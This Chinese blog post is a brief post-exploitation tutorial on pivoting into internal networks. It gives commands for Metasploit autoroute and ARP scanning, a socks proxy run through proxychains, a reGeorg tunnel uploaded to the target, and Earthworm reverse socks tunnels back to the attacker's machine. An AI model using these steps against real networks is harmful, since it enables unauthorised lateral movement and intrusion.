• 欢迎访问惜文个人博客
  • 本博客最新公告:本站已经支持使用QQ和GitHub帐号快捷登录啦!
  • 访问本站建议使用火狐和谷歌浏览器哦!
  • 不知道要写什么哈哈
  • 如果您觉得本站非常有看点,那么赶紧使用Ctrl+D 收藏惜文博客吧
  • 源码模板插件免费下载,传送门:点我去看看传说中的安全之家!

内网渗透

网络安全 惜 文 1年前 (2018-12-01) 1889次浏览 0个评论 扫描二维码

内网渗透

1.msf

拿到一个meterpreter会话后,msf可以很方便的通过添加路由的方式使msf可以攻击内网

meterpreter>run get_local_subnets //获取子网/子网掩码

添加路由
meterpreter>run autoroute -s 子网/子网掩码
或
msf>route add 子网 子网掩码 seesion_id

内网主机存活扫描
meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24

使nmap等工具也可以扫描内网

1.scoks4代理(支持tcp,sock5支持tcp/udp)
use auxiliary/server/socks4a

2.proxychains/proxifier等全局代理软件
proxychains4 nmap -sT ip

2.proxychains/proxifier+reGeorg

1.上传tunnel脚本到靶机
2.python reGeorgSocksProxy.py -u http://ip/tunnel //开启socks服务
3.配置proxychains/proxifier使用socks服务

3.Earthworm(socks5代理)

1.正向,在靶机开启socks服务

ew –s ssocksd –l 888

2.反向

本机添加一个转接隧道,把1080端口收到的代理请求转交给888端口
ew -s rcsocks -l 1008 -e 888

在靶机上开启socks服务,并反弹到本机888端口上
ew -s rssocks -d 本机ip -e 888

接下来就可以配置全局代理软件访问本机1008端口使用靶机socks服务了

惜文博客 , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:内网渗透
喜欢 (0)
[白白]
分享 (0)
惜 文
关于作者:
感觉自己萌萌哒,啦啦啦,个人说明也没啥可写
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址